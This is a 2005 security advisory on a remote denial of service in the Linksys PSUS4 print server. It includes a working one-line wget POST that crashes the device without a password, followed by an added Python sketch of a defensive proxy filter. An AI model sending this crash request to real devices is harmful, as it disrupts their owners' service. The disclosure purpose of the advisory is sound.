- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Rstack Public Security Advisory                     RSTACK SA200502-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                                    http://rstack.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Linksys PSUS4 remote Denial of Service
      Date: February 02, 2005
        ID: 200502-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Background
==========

PSUS4 is one of the small embedded Linksys wired print servers.

Affected products
=================

Model Name: PSUS4 (not tested against others)
Firmware Version: 6032 (not tested against others)

Description
===========

The Rstack team found a tiny denial of service on the Linksys PSUS4.
This device has trouble handling some weird, ugly HTTP requests.
No password is needed.

Here is an example that crashes a remote PSUS4:

  $ wget --post-data="Br1Ce2N1c3" http://192.168.1.2/
  --23:10:05--  http://192.168.1.2/
             => `index.html'
  Connecting to 192.168.1.2:80... connected.
  HTTP request sent, awaiting response...

  => And the PSUS4 is crashed.

Impact
======

A remote attacker could crash the device (DoS).

Workaround
==========

There is no official workaround at this time. Linksys has been
contacted and a patch should be available in the future (*).

If needed, you can try to filter incoming requests with a dedicated
reverse proxy, but that might be too heavy a solution for such a small
device (hint: a reboot will be necessary after each crash).

(*) "or not"...
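
The filtering workaround above, sketched as an added example (not part of the original advisory and not Linksys code): an admission check that a reverse proxy in front of the PSUS4 could apply to each request. The advisory does not say which property of the request triggers the crash, so the allow-list policy, the `ADMIN_NETS` address, the `MAX_BODY` limit and the function name `admit` are all assumptions.

```python
import ipaddress
from urllib.parse import parse_qsl

# Assumed values: hosts allowed to submit forms, and a form size limit.
ADMIN_NETS = [ipaddress.ip_network("192.168.1.10/32")]
MAX_BODY = 512

def admit(client_ip: str, raw_request: bytes) -> tuple[bool, str]:
    """Decide whether a raw HTTP/1.x request may be forwarded to the device."""
    head, sep, body = raw_request.partition(b"\r\n\r\n")
    if not sep:
        return False, "incomplete header block"
    lines = head.decode("latin-1").split("\r\n")
    parts = lines[0].split(" ")
    if len(parts) != 3 or not parts[2].startswith("HTTP/1."):
        return False, "malformed request line"
    method, headers = parts[0], {}
    for line in lines[1:]:
        name, colon, value = line.partition(":")
        if not colon or not name.strip():
            return False, "malformed header"
        headers[name.strip().lower()] = value.strip()
    if method in ("GET", "HEAD"):
        # Read-only requests must not carry a body to the device.
        if body or headers.get("content-length", "0") != "0":
            return False, "body on read-only request"
        return True, "ok"
    if method != "POST":
        return False, "method not allowed"
    ip = ipaddress.ip_address(client_ip)
    if not any(ip in net for net in ADMIN_NETS):
        return False, "POST from non-admin host"
    if headers.get("content-length") != str(len(body)) or len(body) > MAX_BODY:
        return False, "bad content-length"
    try:
        # Assumption: legitimate posts to the device are key=value form data.
        parse_qsl(body.decode("ascii"), keep_blank_values=True, strict_parsing=True)
    except (ValueError, UnicodeDecodeError):
        return False, "body is not key=value form data"
    return True, "ok"

# Constructed samples: the advisory's request shape and a well-formed form post.
CRASH_SHAPE = (b"POST / HTTP/1.0\r\nHost: 192.168.1.2\r\n"
               b"Content-Type: application/x-www-form-urlencoded\r\n"
               b"Content-Length: 10\r\n\r\nBr1Ce2N1c3")
FORM_POST = (b"POST / HTTP/1.0\r\nHost: 192.168.1.2\r\n"
             b"Content-Length: 11\r\n\r\nname=psus4a")
```

Every denial carries a reason string, so the proxy can log it and show how often the device is being probed.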